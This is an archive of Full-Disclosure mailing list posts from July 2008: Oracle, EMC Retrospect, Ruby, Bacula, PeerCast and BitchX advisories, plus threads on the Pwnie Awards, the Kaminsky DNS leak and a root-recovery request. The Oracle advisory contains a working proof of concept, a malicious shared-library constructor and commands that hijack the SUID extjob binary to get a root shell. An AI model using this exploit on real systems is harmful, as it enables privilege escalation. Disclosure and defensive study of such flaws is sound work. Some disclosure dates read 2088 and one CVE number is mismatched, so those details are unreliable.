Re: [Full-disclosure] Pwnie Awards 2008

2008-07-21 Thread David Litchfield
Hey Alexandr,
I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd
be more than happy to - after all one bug over 3 years means someone did a
really good job ;)
Cheers,
David

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Oracle Database Local Untrusted Library Path Vulnerability

2008-07-21 Thread jmpascual

It has been reported to Oracle since 2004 by open3s and affects other libs. The 
workaround is very simple but it is "under investigation / being fixed in 
main codeline. Scheduled for future cpu".

regards

juan manuel pascual


On Sat, 19 Jul 2008, Joxean Koret wrote:

> Oracle Database Local Untrusted Library Path Vulnerability
> --
>
> The Oracle July 2008 Critical Patch Update fixes a vulnerability which
> allows a user in the OINSTALL/DBA group to escalate privileges to root.
>
> Escalating Privileges from "oracle" to "root"
> 
>
> In Oracle 10g R2 and later (Oracle11g is also vulnerable) the affected
> binary, $ORACLE_HOME/bin/extjob, is SUID root and must be suid root. In
> the following forum from Oracle you will find a note at the bottom of
> the page:
>
> (...)
> In 10.2.0.2 and higher
>
> rdbms/admin/externaljob.ora file must be owned by root:oraclegroup and
> be writable only by the owner i.e. 644 (rw-r--r--)
>
> bin/extjob file must be also owned by root:oraclegroup but must be
> setuid i.e. 4750 (-rwsr-x---)
>
> bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
> by
> oracle:oraclegroup
>
> In 11g and higher
>
> Same as 10.2.0.2 but additionally bin/jssu should exist with root
> setuid
> permissions i.e. owned by root:oraclegroup with 4750 (-rwsr-x---)
>
> (...)
>
> The "oraclegroup" is commonly "dba" or "oinstall". Regardless of the
> group's name, if a user can execute OS commands from the database (for
> example, after an attacker gains DBA privileges by abusing an SQL
> injection vulnerability) the user is allowed to execute, modify,
> delete or create new files under the ORACLE_HOME directory.
>
> The following are the linked libraries of the extjob binary:
>
> $ ldd $ORACLE_HOME/bin/extjob
>     linux-gate.so.1 =>  (0xe000)
>     libclntsh.so.10.1 => /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.1 (0xb669d000)
>     libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb6681000)
>     libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb665f000)
>     libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb664d000)
>     libnsl.so.1 => /lib/tls/i686/cmov/libnsl.so.1 (0xb6638000)
>     libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb6509000)
>     libnnz10.so => /home/joxean/oracle10g/product/10.1.0/db_2/lib/libnnz10.so (0xb635f000)
>     libaio.so.1 => /usr/lib/libaio.so.1 (0xb635c000)
>     /lib/ld-linux.so.2 (0xb7f95000)
>
> As you can see, 2 Oracle libraries are linked to the extjob binary. A
> user in the oracle group can't change the binary "extjob" because it's
> owned by root but can change linked libraries to execute arbitrary code
> under the privileges of "root". The following is an example of what can
> be done:
>
> -- Example with libclntsh.so
>
> $ cat test.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> /* constructor: runs as soon as the library is loaded by the SUID binary */
> void __attribute__ ((constructor)) my_init(void)
> {
>     printf("[+] It works! Root shell...\n");
>     system("/bin/sh");
> }
>
> $ cc test.c -fPIC -o test.so -shared
> $ mv /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2 /home/joxean/oracle10g/product/10.2.0/db_2/lib/.libclntsh.so.10.2
> $ mv test.so /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
> $ $ORACLE_HOME/bin/extjob
> [+] It works! Root shell...
> sh-3.1#
>
> Notes
> -
>
> Despite the privileges needed, the vulnerability can be used in a
> multi-stage attack to gain root privileges.
>
> Workaround
> --
>
> Remove the SUID root bit from the extjob binary.
>
> Disclaimer
> --
>
> The information in this advisory and any of its demonstrations is
> provided "as is" without any warranty of any kind.
>
> I am not liable for any direct or indirect damages caused as a result of
> using the information or demonstrations provided in any part of this
> advisory.
>
> Contact
> ---
>
> Joxean Koret - joxeankoret[at]yahoo[dot]es
>
> References
> --
>
> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
> http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=727
> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2613
>
>

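As an added defender's check (not part of the advisory, of Oracle's tooling or of the reply above), the following script audits an ORACLE_HOME against the ownership and mode rules in the Oracle note quoted above, then flags any library a root-SUID binary resolves that its group or others can write, which is the condition the advisory abuses. It assumes GNU coreutils stat and ldd on Linux; the ORACLE_GROUP variable and all function names are the script's own.

```shell
#!/bin/sh
# Added example, not from the advisory: audit an ORACLE_HOME against the
# rules quoted from Oracle's note (externaljob.ora 644 root:<group>,
# extjob 4750 root:<group>, extjobo 755 oracle:<group>, and on 11g
# jssu 4750 root:<group>), then report any shared library that a
# root-SUID binary loads which the group or others can overwrite.
# Assumes GNU coreutils stat (-c) and ldd on a Linux host.

# Compare a file's owner, group and octal mode with what is expected.
# Usage: check_file PATH OWNER GROUP MODE  -> prints one line, returns 0/1
check_file() {
    path=$1; want="$2 $3 $4"
    if [ ! -e "$path" ]; then
        echo "FAIL $path: missing"; return 1
    fi
    have=$(stat -c '%U %G %a' "$path")
    if [ "$have" = "$want" ]; then
        echo "OK   $path ($have)"; return 0
    fi
    echo "FAIL $path: have '$have', want '$want'"; return 1
}

# Return 0 if PATH is writable by its group or by others. stat %A yields a
# string like -rwxrwxr-x: group write is column 6, other write column 9.
writable_by_group_or_other() {
    case "$(stat -c '%A' "$1")" in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

# List the libraries a binary resolves at load time and report any that are
# group- or world-writable. ldd invokes the dynamic loader on the binary, so
# only point it at files you already trust to be Oracle's own.
check_linked_libs() {
    bin=$1; rc=0
    for lib in $(ldd "$bin" | awk '$2 == "=>" && $3 ~ /^\// {print $3}'); do
        if writable_by_group_or_other "$lib"; then
            echo "FAIL $lib is group/world writable ($(stat -c '%a' "$lib"))"
            rc=1
        fi
    done
    return $rc
}

# Run the whole audit. Usage: audit_oracle_home ORACLE_HOME ORACLEGROUP [11g]
audit_oracle_home() {
    oh=$1; grp=$2; ver=${3:-10g}; rc=0
    check_file "$oh/rdbms/admin/externaljob.ora" root "$grp" 644 || rc=1
    check_file "$oh/bin/extjob"  root   "$grp" 4750              || rc=1
    check_file "$oh/bin/extjobo" oracle "$grp" 755               || rc=1
    if [ "$ver" = 11g ]; then
        check_file "$oh/bin/jssu" root "$grp" 4750 || rc=1
    fi
    # every root-SUID helper inherits the trust of the libraries it loads
    for suid in "$oh/bin/extjob" "$oh/bin/jssu"; do
        if [ -x "$suid" ]; then
            check_linked_libs "$suid" || rc=1
        fi
    done
    return $rc
}

# Stand-alone use: ORACLE_GROUP is this script's own variable (default dba).
if [ -n "$ORACLE_HOME" ]; then
    audit_oracle_home "$ORACLE_HOME" "${ORACLE_GROUP:-dba}" \
        || echo "audit: problems found under $ORACLE_HOME"
fi
```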


[Full-disclosure] FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer reference Denial of Service Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 NULL-Pointer
reference Denial of Service Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect 7 backup Client 7.5.116

-- Vulnerability Details:

There exists a vulnerability in EMC's Retrospect Client 7.5.116 which
allows remote attackers to cause a read access violation
(client termination and loss of backup service) via malformed packets to
TCP port 497, which trigger an assert error.
This is a design error of EMC Dantz: using a NULL-pointer reference by
mistake.

-- Vendor Response:
EMC has issued an update to correct this vulnerability:

http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2088-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team


Disclaimer:

Although Fortinet has attempted to provide accurate information in these
materials, Fortinet assumes no legal responsibility for the accuracy or
completeness of the information. More specific information is available on
request from Fortinet. Please note that Fortinet's product information
does not constitute or contain any guarantee, warranty or legally binding
representation, unless expressly identified as such in a duly signed
writing.

About Fortinet ( www.fortinet.com ):

Fortinet is the pioneer and leading provider of ASIC-accelerated unified
threat management, or UTM, security systems, which are used by enterprises
and service providers to increase their security while reducing total
operating costs. Fortinet solutions were built from the ground up to
integrate multiple levels of security protection--including firewall,
antivirus, intrusion prevention, VPN, spyware prevention and anti-spam --
designed to help customers protect against network and content level
threats. Leveraging a custom ASIC and unified interface, Fortinet
solutions offer advanced security functionality that scales from remote
office to chassis-based solutions with integrated management and
reporting. Fortinet solutions have won multiple awards around the world
and are the only security products that are certified in six programs by
ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and
Anti-Spyware). Fortinet is privately held and based in Sunnyvale,
California.


[Full-disclosure] FGA-2008-16: EMC Dantz Retrospect 7 backup Server Authentication Module Weak Password Hash Arithmetic Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Server Authentication Module
Weak Password Hash Arithmetic Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect Backup Server 7.5.508

-- Vulnerability Details:

The hash arithmetic which the EMC Dantz Retrospect 7 backup Server
Authentication Module uses is too simple.
Due to the poor hash arithmetic, an attacker will obtain the client's
password using brute force without it being time-consuming.

-- Vendor Response:
EMC has issued an update to correct this vulnerability:
http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2088-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team





[Full-disclosure] FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory corruption Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Client 7.5.116 Remote Memory
corruption Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect 7 backup Client 7.5.116

-- Vulnerability Details:

The retroclient.exe process listens, in a default configuration, on TCP
port 497.
When packets of 2064 bytes filled with 0x00 are sent continuously, after
about 30 seconds to 5 minutes the status box shows: “Client networking
not available, or service not running”; if one keeps on sending packets,
a few times later the retroclient.exe process terminates, the backup
service is lost and TCP port 497 is closed.


-- Vendor Response:
EMC has issued an update to correct this vulnerability:

http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2088-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team




[Full-disclosure] EMC Dantz Retrospect 7 backup Client PlainText Password Hash Disclosure Vulnerability

2008-07-21 Thread zhliu
FGA-2008-16: EMC Dantz Retrospect 7 backup Client PlainText Password Hash
Disclosure Vulnerability
http://www.fortiguardcenter.com/advisory/FGA-2008-16.html
July 20, 2008

-- Affected Vendors:
EMC

-- Affected Products:
EMC Dantz Retrospect 7 backup Client 7.5.116

-- Vulnerability Details:

The transfer of the password hash of EMC Dantz Retrospect 7 backup Client
over the network is in plaintext.
By sending a malicious packet to the client, the client will send back lots
of information including the password hash, resulting in a loss of
confidentiality.

What is more, EMC Dantz Retrospect 7 backup server's authentication module
uses weak password hash arithmetic; by brute-forcing it an attacker can
gain full control of the client's machine.


-- Vendor Response:
EMC has issued an update to correct this vulnerability:

http://www.emcinsignia.com/updates

-- Disclosure Timeline:
2008-04-20 - Vulnerability reported to vendor
2008-06-30 - Vendor issued update
2088-07-20 - Coordinated public release of advisory

Acknowledgment:

Zhenhua Liu of Fortinet's FortiGuard Global Security Research Team





[Full-disclosure] [SECURITY] [DSA 1612-1] New ruby1.8 packages fix several vulnerabilities

2008-07-21 Thread Moritz Muehlenhoff

Debian Security Advisory DSA-1612-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
July 21, 2008 http://www.debian.org/security/faq

Package: ruby1.8
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-2662 CVE-2008-2663 CVE-2008-2664 CVE-2008-2725 
CVE-2008-2726 CVE-2008-2376

Several vulnerabilities have been discovered in the interpreter for
the Ruby language, which may lead to denial of service or the
execution of arbitrary code. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2006-2662

Drew Yao discovered that multiple integer overflows in the string
processing code may lead to denial of service and potentially the
execution of arbitrary code.

CVE-2008-2663

Drew Yao discovered that multiple integer overflows in the string
processing code may lead to denial of service and potentially the
execution of arbitrary code.

CVE-2008-2664

Drew Yao discovered that a programming error in the string
processing code may lead to denial of service and potentially the
execution of arbitrary code.

CVE-2008-2725

Drew Yao discovered that an integer overflow in the array handling
code may lead to denial of service and potentially the execution
of arbitrary code.

CVE-2008-2726

Drew Yao discovered that an integer overflow in the array handling
code may lead to denial of service and potentially the execution
of arbitrary code.

CVE-2008-2376

It was discovered that an integer overflow in the array handling
code may lead to denial of service and potentially the execution
of arbitrary code.

For the stable distribution (etch), these problems have been fixed in
version 1.8.5-4etch2.

For the unstable distribution (sid), these problems have been fixed in
version 1.8.7.22-2.

We recommend that you upgrade your ruby1.8 packages.

Upgrade instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Stable updates are available for amd64, arm, hppa, i386, ia64, mipsel, s390 and 
sparc.

Source archives:

Re: [Full-disclosure] Pwnie Awards 2008

2008-07-21 Thread Kingcope Kingcope
OOPS!:
By question I landed on the Server Side Bug Nomination List Again.
Thanks for riding this Ceremony.

kcope / eliteb0y / Nikos



OOPS I did it again (fool(disclosure))
2008/7/21 David Litchfield <[EMAIL PROTECTED]>:

> Hey Alexandr,
> I see I'm invited to award Brett his pwnie for his SQL flaw if he wins. I'd
> be more than happy to - after all one bug over 3 years means someone did a
> really good job ;)
> Cheers,
> David

[Full-disclosure] [ GLSA 200807-10 ] Bacula: Information disclosure

2008-07-21 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Bacula: Information disclosure
  Date: July 21, 2008
  Bugs: #196834
ID: 200807-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in Bacula may allow local attackers to obtain sensitive
information.

Background
==

Bacula is a network based backup suite.

Affected packages
=

    -------------------------------------------------------------------
     Package               /  Vulnerable  /  Unaffected
    -------------------------------------------------------------------
      1  app-backup/bacula        < 2.4.1          >= 2.4.1

Description
===

Matthijs Kooijman reported that the "make_catalog_backup" script uses
the MySQL password as a command line argument when invoking other
programs.

Impact
==

A local attacker could list the processes on the local machine when the
script is running to obtain the MySQL password. Note: The password
could also be disclosed via network sniffing attacks when the script
fails, in which case it would be sent via cleartext e-mail.

Workaround
==

There is no known workaround at this time.

Resolution
==

A warning about this issue has been added in version 2.4.1, but the
issue is still unfixed. We advise not to use the make_catalog_backup
script, but to put all MySQL parameters into a dedicated file readable
only by the user running Bacula.

References
==

  [ 1 ] CVE-2007-5626
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

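The resolution above says to move the MySQL parameters out of the command line and into a file readable only by the Bacula user. As an added illustration that is not part of the GLSA or of Bacula's make_catalog_backup script, the following shell shows the weak invocation beside the hardened one, creates the option file without a world-readable window, and refuses to use an option file whose mode is too open. It assumes a MySQL client that honours --defaults-extra-file (which must be the first argument) and GNU coreutils stat; the function names are the example's own.

```shell
#!/bin/sh
# Added example, not Bacula's own code: keep the MySQL password out of the
# process list by writing it to a 0600 [client] option file and pointing
# the client at that file, instead of passing -p<password> in argv.
# Assumes GNU coreutils stat (-c) and a MySQL client supporting
# --defaults-extra-file.

# Weak pattern from make_catalog_backup: the password is an argv element,
# so any local user can read it with ps while the dump is running.
weak_dump_cmd() {
    db=$1; user=$2; pass=$3
    printf '%s\n' "mysqldump -u $user -p$pass $db"
}

# Write a [client] option file that only its owner can read. The umask is
# set before the file is (re)created, so there is no moment at which the
# password is readable by group or others.
# Usage: write_option_file PATH USER PASSWORD [HOST]  -> returns 0 if mode is 600
write_option_file() {
    path=$1; user=$2; pass=$3; host=${4:-localhost}
    ( umask 077
      rm -f "$path"   # an existing file would keep its old, possibly open, mode
      printf '[client]\nuser=%s\npassword=%s\nhost=%s\n' \
          "$user" "$pass" "$host" > "$path" )
    [ "$(stat -c '%a' "$path")" = "600" ]
}

# Hardened invocation: no credential appears in the argument vector.
safe_dump_cmd() {
    db=$1; optfile=$2
    printf '%s\n' "mysqldump --defaults-extra-file=$optfile $db"
}

# Gate for the backup script: accept the option file only if it is a
# regular file owned by the caller with mode 600 or 400.
option_file_is_private() {
    path=$1
    [ -f "$path" ] || return 1
    [ "$(stat -c '%U' "$path")" = "$(id -un)" ] || return 1
    case "$(stat -c '%a' "$path")" in
        600|400) return 0 ;;
        *) return 1 ;;
    esac
}

# Stand-alone use, with a constructed credential: build the file, then
# only run the dump command if the file passed the privacy check.
run_catalog_backup() {
    db=$1; optfile=$2
    option_file_is_private "$optfile" || { echo "refusing: $optfile is too open"; return 1; }
    safe_dump_cmd "$db" "$optfile"
}
```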


[Full-disclosure] [ GLSA 200807-11 ] PeerCast: Buffer overflow

2008-07-21 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: PeerCast: Buffer overflow
  Date: July 21, 2008
  Bugs: #220281
ID: 200807-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow vulnerability in PeerCast may allow for the remote
execution of arbitrary code.

Background
==

PeerCast is a client and server for P2P-radio networks.

Affected packages
=

    -------------------------------------------------------------------
     Package                  /  Vulnerable     /  Unaffected
    -------------------------------------------------------------------
      1  media-sound/peercast      < 0.1218-r1       >= 0.1218-r1

Description
===

Nico Golde reported a boundary error in the HTTP::getAuthUserPass()
function when processing overly long HTTP Basic authentication
requests.

Impact
==

A remote attacker could send a specially crafted HTTP request to the
vulnerable server, possibly resulting in the remote execution of
arbitrary code with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All PeerCast users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=media-sound/peercast-0.1218-r1"

References
==

  [ 1 ] CVE-2008-2040
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2040

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200807-12 ] BitchX: Multiple vulnerabilities

2008-07-21 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200807-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: BitchX: Multiple vulnerabilities
  Date: July 21, 2008
  Bugs: #190667
ID: 200807-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in BitchX may allow for the remote execution
of arbitrary code or symlink attacks.

Background
==

BitchX is an IRC client.

Affected packages
=

    -------------------------------------------------------------------
     Package            /  Vulnerable  /  Unaffected
    -------------------------------------------------------------------
      1  net-irc/bitchx        <= 1.1-r4       Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.

Description
===

bannedit reported a boundary error when handling overly long IRC MODE
messages (CVE-2007-4584). Nico Golde reported an insecure creation of a
temporary file within the e_hostname() function (CVE-2007-5839).

Impact
==

A remote attacker could entice a user to connect to a malicious IRC
server, resulting in the remote execution of arbitrary code with the
privileges of the user running the application. A local attacker could
perform symlink attacks to overwrite arbitrary files on the local
machine.

Workaround
==

There is no known workaround at this time.

Resolution
==

Since BitchX is no longer maintained, we recommend that users unmerge
the vulnerable package and switch to another IRC client:

# emerge --unmerge "net-irc/bitchx"

References
==

  [ 1 ] CVE-2007-4584
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4584
  [ 2 ] CVE-2007-5839
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5839

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] NULL pointer in ZDaemon 1.08.07

2008-07-21 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  ZDaemon
  http://www.zdaemon.org
Versions: <= 1.08.07
Platforms:Windows and Linux
Bug:  NULL pointer
Exploitation: remote, versus server (in-game)
Date: 21 Jul 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


ZDaemon is one of the most played multiplayer ports of the Doom engine
and at the same time one of the most criticized.


###

==
2) Bug
==


The ZDaemon server is affected by a NULL pointer vulnerability which
allows an attacker to crash it when a specific type of command (type 6)
is used.

The attacker needs to join the server to exploit this bug, so his IP
address must not be banned and he must know the right keyword if the
server is protected with a password.


###

===
3) The Code
===


http://aluigi.org/poc/zdaemonull.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
http://backup.aluigi.org
http://mirror.aluigi.org



[Full-disclosure] Kaminsky's DNS Issue Leaked?

2008-07-21 Thread natron
It appears Matasano posted an explanation of Dan Kaminsky's DNS issue
to their blog today, but it looks like it may have been yanked back down.
My Google Reader account nabbed it via the RSS feed while it was up.

It looks like maybe they had this typed up, ready to hit "post" as
soon as someone else figured it out?  They had advance knowledge of
the issue via conference calls with Kaminsky.  Halvar Flake posted
some speculation on what the issue was, but his speculation was not
the full issue; only a re-hash of previously known issues.  In any
event, Halvar's ideas were close, but incomplete.  Matasano filled in
the missing details, possibly by accident.  :)

Details: 
http://blog.invisibledenizen.org/2008/07/kaminskys-dns-issue-accidentally-leaked.html

-N



[Full-disclosure] help: I need to crack my box

2008-07-21 Thread Lucio Crusca
Believe it or not, I have a Linux box (mine, yes it's mine) I need to own...
the problem is that it physically resides a few hundred km from here and someone
else has changed the root password... I can still log in as luser and I
wonder if I have a chance to become root again. It's a more or less current
Debian lenny i386 with GNOME. Have you got anything for me?

Thanks in advance,
Lucio.



Re: [Full-disclosure] help: I need to crack my box

2008-07-21 Thread Paul Schmehl
--On Monday, July 21, 2008 22:47:26 +0200 Lucio Crusca <[EMAIL PROTECTED]> wrote:

> Believe it or not, I have a Linux box (mine, yes it's mine) I need to own...
> the problem is that it physically resides a few hundred km from here and someone
> else has changed the root password... I can still log in as luser and I
> wonder if I have a chance to become root again. It's a more or less current
> Debian lenny i386 with GNOME. Have you got anything for me?

Ask the hosting company if they have an IP KVM they can connect to the box.  If 
they do, you can reboot and go into single-user mode and reset the root 
password.  I would then take down the net interfaces until you clean the box. 
Otherwise your info might be disclosed while you're working on it.

If you can't reboot it remotely, have their staff reboot it for you while 
you're logged in to the IP KVM.  Then get into single-user mode and regain 
control of the box.

-- 
Paul Schmehl
As if it wasn't already obvious,
my opinions are my own and not
those of my employer.



[Full-disclosure] [ MDVSA-2008:151 ] - Updated libxslt packages fix buffer overflow vulnerability

2008-07-21 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:151
 http://www.mandriva.com/security/
 ___
 
 Package : libxslt
 Date: July 21, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A buffer overflow vulnerability in libxslt could be exploited via an
 XSL style sheet file with a long XSLT transformation match condition,
 which could possibly lead to the execution of arbitrary code
 (CVE-2008-1767).
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1767
 ___
 
 Updated Packages:
 

Re: [Full-disclosure] help: I need to crack my box

2008-07-21 Thread Alex Howells
2008/7/21 Lucio Crusca <[EMAIL PROTECTED]>:
> Believe it or not, I have a Linux box (mine, yes it's mine) I need to own...
> the problem is that it physically resides a few hundred km from here and someone
> else has changed the root password... I can still log in as luser and I
> wonder if I have a chance to become root again. It's a more or less current
> Debian lenny i386 with GNOME. Have you got anything for me?

Probably not, and I can't think of anyone hiding a 0-day who is going to
release it for this. Sorry.
